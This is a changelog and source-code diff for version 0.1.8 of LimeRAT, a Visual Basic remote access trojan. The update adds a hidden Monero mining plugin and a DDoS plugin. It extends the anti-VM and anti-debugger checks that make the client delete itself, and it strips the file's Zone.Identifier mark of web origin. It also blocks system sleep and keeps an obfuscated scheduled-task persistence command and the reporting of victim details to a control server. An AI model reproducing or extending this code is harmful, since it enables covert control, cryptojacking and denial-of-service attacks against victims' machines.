UPDATE 0.1.8

- Added Monero CPU Miner
- Added DDoS
- Added [Client] prevent PC sleep\idle
- Added [Client] DeleteZoneIdentifier
- Added Support Folder
- Updated [Client] Anti-VM
- Fixed [Client] high CPU usage
- Fixed Plugin system
- Fixed [Server] Lags when send large size file
- Fixed many small bugs

LimeRAT.sln

@@ -4,23 +4,6 @@ Microsoft Visual Studio Solution File, Format Version 12.00
 VisualStudioVersion = 15.0.27703.2000
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Server", "Project\Server\Server.vbproj", "{B672DE08-269D-4AA6-8535-D3BC59BB086B}"
-	ProjectSection(ProjectDependencies) = postProject
-		{CFE81801-C2C5-4444-BE67-64EFFEFDCD73} = {CFE81801-C2C5-4444-BE67-64EFFEFDCD73}
-		{73EF1630-1208-43C5-9E3F-19A2923875C5} = {73EF1630-1208-43C5-9E3F-19A2923875C5}
-		{2B47F84C-9CA3-47E9-9970-8AF8233A9F12} = {2B47F84C-9CA3-47E9-9970-8AF8233A9F12}
-		{73ECE052-4218-465D-AA2E-A2D03448BEDD} = {73ECE052-4218-465D-AA2E-A2D03448BEDD}
-		{D47C706B-152F-46B5-840A-4EBB2CFAFE33} = {D47C706B-152F-46B5-840A-4EBB2CFAFE33}
-		{CF8C386C-46B2-4F40-BCB1-774C01E72B1C} = {CF8C386C-46B2-4F40-BCB1-774C01E72B1C}
-		{8F71C671-F53C-4F4F-98B9-8B8D3263C0DB} = {8F71C671-F53C-4F4F-98B9-8B8D3263C0DB}
-		{55625889-F7BB-4533-9702-DDE98FBB0DDF} = {55625889-F7BB-4533-9702-DDE98FBB0DDF}
-		{E211C5CD-85F0-48D2-A18F-2E59AD47DDC3} = {E211C5CD-85F0-48D2-A18F-2E59AD47DDC3}
-		{733C37D8-858F-44EE-9D17-790F7DE9C040} = {733C37D8-858F-44EE-9D17-790F7DE9C040}
-		{27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D} = {27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D}
-		{363A6DE4-59D9-451B-A4FD-1FE763970E1E} = {363A6DE4-59D9-451B-A4FD-1FE763970E1E}
-		{AF0885E4-9E3B-49CA-9F13-0F869E8BF89D} = {AF0885E4-9E3B-49CA-9F13-0F869E8BF89D}
-		{9C30CAE4-6FBE-45CC-90C2-1D739DB92E86} = {9C30CAE4-6FBE-45CC-90C2-1D739DB92E86}
-		{A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC} = {A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC}
-	EndProjectSection
 EndProject
 Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Client", "Project\Client\Client.vbproj", "{1E2A1E78-ED0B-414B-A956-86232B1025BE}"
 EndProject
@@ -56,6 +39,10 @@ Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "CRYP", "Project\Plugins\CRY
 EndProject
 Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "KLG", "Project\Plugins\KLG\KLG.vbproj", "{CF8C386C-46B2-4F40-BCB1-774C01E72B1C}"
 EndProject
+Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "XMR", "Project\Plugins\XMR\XMR.vbproj", "{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}"
+EndProject
+Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "DDOS", "Project\Plugins\DDOS\DDOS.vbproj", "{F56E4E1A-AB7A-4494-ACB9-8757164B0524}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
@@ -130,6 +117,14 @@ Global
 		{CF8C386C-46B2-4F40-BCB1-774C01E72B1C}.Debug|Any CPU.Build.0 = Debug|Any CPU
 		{CF8C386C-46B2-4F40-BCB1-774C01E72B1C}.Release|Any CPU.ActiveCfg = Release|Any CPU
 		{CF8C386C-46B2-4F40-BCB1-774C01E72B1C}.Release|Any CPU.Build.0 = Release|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Release|Any CPU.Build.0 = Release|Any CPU
+		{F56E4E1A-AB7A-4494-ACB9-8757164B0524}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{F56E4E1A-AB7A-4494-ACB9-8757164B0524}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{F56E4E1A-AB7A-4494-ACB9-8757164B0524}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{F56E4E1A-AB7A-4494-ACB9-8757164B0524}.Release|Any CPU.Build.0 = Release|Any CPU
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
@@ -150,6 +145,8 @@ Global
 		{363A6DE4-59D9-451B-A4FD-1FE763970E1E} = {7D34A64F-BEA5-42D4-A3FB-D9972BB33BEC}
 		{AF0885E4-9E3B-49CA-9F13-0F869E8BF89D} = {7D34A64F-BEA5-42D4-A3FB-D9972BB33BEC}
 		{CF8C386C-46B2-4F40-BCB1-774C01E72B1C} = {7D34A64F-BEA5-42D4-A3FB-D9972BB33BEC}
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F} = {7D34A64F-BEA5-42D4-A3FB-D9972BB33BEC}
+		{F56E4E1A-AB7A-4494-ACB9-8757164B0524} = {7D34A64F-BEA5-42D4-A3FB-D9972BB33BEC}
 	EndGlobalSection
 	GlobalSection(ExtensibilityGlobals) = postSolution
 		SolutionGuid = {D2B7BDC0-251E-4521-91E5-76CD9CF13D23}

Project/Client/C_AntiVM.vb

@@ -19,8 +19,12 @@
                 ElseIf LoadLibrary("SbieDll.dll") = True Then
                     GoTo del
 
+                ElseIf Diagnostics.Debugger.IsLogging OrElse Diagnostics.Debugger.IsAttached Then
+                    GoTo del
+
                 ElseIf IO.File.Exists(Environment.GetEnvironmentVariable("windir") & "\vboxhook.dll") Then
                     GoTo del
+
                 End If
                 Exit Sub
 del:

Project/Client/C_Commands.vb

@@ -46,8 +46,10 @@
                         If GM.Name = "CN" Then
                             GM.Invoke(Nothing, New Object() {C_Settings.HOST, C_Settings.PORT, C_Socket.KEY, C_Socket.SPL, C_Settings.EncryptionKey, C_Settings.fullpath, C_ID.HWID, C_ID.Bot, C_Encryption.AES_Decrypt(C_Settings.Pastebin)})
                         ElseIf GM.Name = "MISC" Then
-                            GM.Invoke(Nothing, New Object() {CMD})
-                            ElseIf GM.Name = "CL" Then
+                            GM.Invoke(Nothing, New Object() {C_ID.HWID, CMD})
+                        ElseIf GM.Name = "CL" Then
+                            GM.Invoke(Nothing, New Object() {C_Settings.DROP, C_Settings.EXE, C_Settings.fullpath, C_ID.Privileges, C_ID.HWID, CMD})
+                        ElseIf GM.Name = "XMR" Then
                             GM.Invoke(Nothing, New Object() {C_Settings.DROP, C_Settings.EXE, C_Settings.fullpath, C_ID.Privileges, C_ID.HWID, CMD})
                         End If
                     Next

Project/Client/C_CriticalProcesses.vb → Project/Client/C_CriticalProcess.vb

@@ -1,6 +1,6 @@
 Namespace Lime
 
-    Public Class C_CriticalProcesses
+    Public Class C_CriticalProcess
         'https://www.codeproject.com/Articles/43405/Protecting-Your-Process-with-RtlSetProcessIsCriti
         <Runtime.InteropServices.DllImport("NTdll.dll", EntryPoint:="RtlSetProcessIsCritical", SetLastError:=True)>
         Public Shared Sub SetCurrentProcessIsCritical(
@@ -9,7 +9,7 @@
                           <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.Bool)> ByVal needSystemCriticalBreaks As Boolean)
         End Sub
 
-        Public Shared Sub CriticalProcesses_Enable()
+        Public Shared Sub CriticalProcess_Enable()
             Try
                 Dim refWasCritical As Boolean
                 System.Diagnostics.Process.EnterDebugMode()

Project/Client/C_Functions.vb

@@ -21,7 +21,7 @@
             Try
                 Return Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\" & C_ID.HWID).GetValue(n, "")
             Catch ex As Exception
-                Return ""
+                Return Nothing
             End Try
         End Function
 
@@ -50,9 +50,9 @@
 
         Sub Handler_SessionEnding(ByVal sender As Object, ByVal e As Microsoft.Win32.SessionEndingEventArgs)
             If e.Reason = Microsoft.Win32.SessionEndReasons.Logoff Then
-                C_CriticalProcesses.CriticalProcesses_Disable()
+                C_CriticalProcess.CriticalProcesses_Disable()
             ElseIf e.Reason = Microsoft.Win32.SessionEndReasons.SystemShutdown Then
-                C_CriticalProcesses.CriticalProcesses_Disable()
+                C_CriticalProcess.CriticalProcesses_Disable()
             End If
         End Sub
 
@@ -84,5 +84,13 @@
             End If
         End Function
 
+        <Runtime.InteropServices.DllImport("kernel32.dll", CharSet:=Runtime.InteropServices.CharSet.Auto, BestFitMapping:=False, ThrowOnUnmappableChar:=True, SetLastError:=True)>
+        Function DeleteFile(<Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.LPTStr)> ByVal filepath As String
+            ) As <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.Bool)> Boolean
+        End Function
+        Sub DeleteZoneIdentifier(ByVal filePath As String)
+            Try : DeleteFile(filePath + ":Zone.Identifier") : Catch : End Try
+        End Sub
+
     End Module
 End Namespace

Project/Client/C_ID.vb

@@ -157,6 +157,35 @@
             End Try
         End Function
 
+        Public Shared Function XMR() As String
+            Try
+                If GTV("XMR") = Nothing Then
+                    STV("XMR", "Idle")
+                    Return "Idle"
+                End If
+
+                Dim p() As Diagnostics.Process
+                p = Diagnostics.Process.GetProcessesByName("Regasm")
+                If p.Length > 0 Then
+                    Try
+                        Dim wmiQuery As String = String.Format("select CommandLine from Win32_Process where Name='{0}'", "Regasm.exe")
+                        Dim searcher As Management.ManagementObjectSearcher = New Management.ManagementObjectSearcher(wmiQuery)
+                        Dim retObjectCollection As Management.ManagementObjectCollection = searcher.Get
+                        For Each retObject As Management.ManagementObject In retObjectCollection
+                            If retObject("CommandLine").ToString.Contains("--donate-level=1") Then
+                                Return "Running"
+                            End If
+                        Next
+                    Catch ex As Exception
+                    End Try
+                Else
+                    Return "Idle"
+                End If
+
+            Catch ex As Exception
+            End Try
+        End Function
+
     End Class
 
 End Namespace

Project/Client/C_Installation.vb

@@ -16,7 +16,8 @@
                             C_Settings.MTX.Close()
                             C_Settings.MTX = Nothing
                         End If
-                        C_CriticalProcesses.CriticalProcesses_Disable()
+
+                        C_CriticalProcess.CriticalProcesses_Disable()
                         Diagnostics.Process.Start(C_Settings.fullpath)
                         End
                     Catch : End Try
@@ -45,13 +46,14 @@
                 NewFile.Flush()
                 NewFile.Close()
                 IO.File.SetAttributes(C_Settings.fullpath, IO.FileAttributes.System + IO.FileAttributes.Hidden)
+                DeleteZoneIdentifier(C_Settings.fullpath)
             Catch : End Try
         End Sub
 
         Private Shared Sub AddReg(ByVal Privileges As Boolean)
             Try
                 If Privileges = True Then
-                    'Microsoft.Win32.Registry.LocalMachine.CreateSubKey(BS(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=="))).SetValue(C_Settings.EXE, C_Settings.fullpath)
+                    'Microsoft.Win32.Registry.LocalMachine.CreateSubKey
                     '"schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "
                     Shell(BS(Convert.FromBase64String("c2NodGFza3MgL2NyZWF0ZSAvZiAvc2MgT05MT0dPTiAvUkwgSElHSEVTVCAvdG4gTGltZVJBVC1BZG1pbiAvdHIg")) + """'" & C_Settings.fullpath & "'""", AppWinStyle.Hide, False, -1)
                 Else

Project/Client/C_Main.vb

@@ -1,5 +1,5 @@
 '##################################################################
-'##         N Y A N   C A T  |||   Updated on Aug/19/2018        ##
+'##         N Y A N   C A T  |||   Updated on Aug/20/2018        ##
 '##################################################################
 '##                                                              ##
 '##                                                              ##
@@ -47,7 +47,6 @@ Namespace Lime
                 'Thread.Sleep(35000) '[New client infected]
                 'End If
 
-
                 Dim num As Integer = C_Settings.Delay
                 Do Until num = 0
                     Threading.Thread.Sleep(1000)
@@ -68,6 +67,8 @@ Namespace Lime
 
                 C_Socket.T1.Start()
 
+#Region "Plugins Threads"
+
                 If C_Settings.USB Then
                     Dim _USB As Threading.Thread = New Threading.Thread(AddressOf StartSP)
                     _USB.Start()
@@ -83,6 +84,7 @@ Namespace Lime
 
                 Dim CHK As Threading.Thread = New Threading.Thread(AddressOf Checking)
                 CHK.Start()
+#End Region
 
                 Dim DW As Threading.Thread = New Threading.Thread(AddressOf C_Downloader.Downloader)
                 DW.Start()
@@ -93,7 +95,7 @@ Namespace Lime
                     _BTC.Start()
                 End If
 
-                C_CriticalProcesses.CriticalProcesses_Enable()
+                C_CriticalProcess.CriticalProcess_Enable()
 
                 AddHandler Microsoft.Win32.SystemEvents.SessionEnding, AddressOf Handler_SessionEnding
 
@@ -103,30 +105,46 @@ Namespace Lime
         End Sub
 
 #Region "Plugins Loops"
-
+        Declare Sub IdleTimerReset Lib "coredll.dll" Alias "SystemIdleTimerReset" ()
         Private Shared Sub Checking()
             Threading.Thread.CurrentThread.Sleep(5000)
-            Dim Old As String = GTV("Rans-Status")
-            Dim Old2 As String = GTV("USB")
-
+            Dim OldRans As String = GTV("Rans-Status")
+            Dim OldUSB As String = GTV("USB")
+            Dim OldXMR As String = GTV("XMR")
+            Dim OldFLD As String = GTV("Flood")
+            C_Nosleep.No_Sleep()
 
             While True
                 Try
 1:
                     If C.CNT = True Then
                         Threading.Thread.CurrentThread.Sleep(3000)
                         'Compare old string with new string            
-                        If Old <> GTV("Rans-Status").ToString Then
-                            Old = GTV("Rans-Status")
-                            C.Send("!R" & SPL & GTV("Rans-Status").ToString)
+                        If OldRans <> GTV("Rans-Status").ToString Then
+                            OldRans = GTV("Rans-Status")
+                            C.Send("!R" & SPL & OldRans)
                         End If
 
                         If C_Settings.USB Then
-                            If Old2 <> GTV("USB").ToString Then
-                                Old2 = GTV("USB")
-                                C.Send("!SP" & SPL & GTV("USB").ToString)
+                            If OldUSB <> GTV("USB").ToString Then
+                                OldUSB = GTV("USB")
+                                C.Send("!SP" & SPL & OldUSB)
                             End If
                         End If
+
+                        If OldXMR <> C_ID.XMR Then
+                            STV("XMR", C_ID.XMR.ToString)
+                            OldXMR = GTV("XMR")
+                            C.Send("!X" & SPL & OldXMR)
+                        End If
+
+                        If OldFLD <> GTV("Flood").ToString Then
+                            OldFLD = GTV("Flood")
+                            C.Send("MSG" & SPL & "Flood! " & OldFLD)
+                            OldFLD = ""
+                            STV("Flood", "")
+                        End If
+
                     Else
                         Threading.Thread.CurrentThread.Sleep(5000)
                     End If
@@ -146,8 +164,8 @@ Namespace Lime
                             C.Send("PLUSB")
                             Exit While
                         End If
+                        Threading.Thread.Sleep(5000)
                     End While
-
                 Else
                     C_Commands.Plugin(GZip(Convert.FromBase64String(GTV("_USB")), False))
                 End If
@@ -165,6 +183,7 @@ Namespace Lime
                             C.Send("PLPIN")
                             Exit While
                         End If
+                        Threading.Thread.Sleep(5000)
                     End While
 
                 Else
@@ -184,6 +203,7 @@ Namespace Lime
                             C.Send("PLKLG")
                             Exit While
                         End If
+                        Threading.Thread.Sleep(5000)
                     End While
 
                 Else
@@ -193,7 +213,6 @@ Namespace Lime
                 C.Send("MSG" + SPL + "_KLG Error! " + ex.Message)
             End Try
         End Sub
-
 #End Region
 
     End Class

Project/Client/C_Nosleep.vb

@@ -0,0 +1,21 @@
+Namespace Lime
+
+    Public Class C_Nosleep
+
+        'https://www.codeproject.com/Articles/290253/Give-your-computer-Sleep-Apnea-Dont-let-it-go-to-s
+        Declare Function SetThreadExecutionState Lib "kernel32" (ByVal esflags As EXECUTION_STATE) As EXECUTION_STATE
+        Enum EXECUTION_STATE
+            ES_SYSTEM_REQUIRED = &H1
+            ES_DISPLAY_REQUIRED = &H2
+            ES_CONTINUOUS = &H80000000
+        End Enum
+        ' Call API - force no sleep and no display turn off
+        Public Shared Function No_Sleep() As EXECUTION_STATE
+            Return SetThreadExecutionState(EXECUTION_STATE.ES_SYSTEM_REQUIRED Or
+       EXECUTION_STATE.ES_CONTINUOUS Or EXECUTION_STATE.ES_DISPLAY_REQUIRED)
+        End Function
+
+    End Class
+
+
+End Namespace

Project/Client/C_Socket.vb

@@ -76,10 +76,10 @@ e:      ' clear things and ReConnect
                 C = New Net.Sockets.TcpClient
                 C.ReceiveTimeout = -1
                 C.SendTimeout = -1
-                C.SendBufferSize = 999999
-                C.ReceiveBufferSize = 999999
-                C.Client.SendBufferSize = 999999
-                C.Client.ReceiveBufferSize = 999999
+                C.SendBufferSize = 9999999
+                C.ReceiveBufferSize = 9999999
+                C.Client.SendBufferSize = 9999999
+                C.Client.ReceiveBufferSize = 9999999
                 KA = 0
 #If DEBUG Then
                 C_Settings.HOST = "127.0.0.1"
@@ -98,8 +98,8 @@ e:      ' clear things and ReConnect
                 C.Client.Connect(C_Settings.HOST, C_Settings.PORT)
                 CNT = True
                 'Send info to server
-                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.7.3D", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
-                                   C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.USBSP, SPL, " ", SPL, " "))
+                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.0", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
+                                   C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, " ", SPL, " "))
             Catch ex As Exception
                 Threading.Thread.CurrentThread.Sleep(R.Next(5000))
                 GoTo e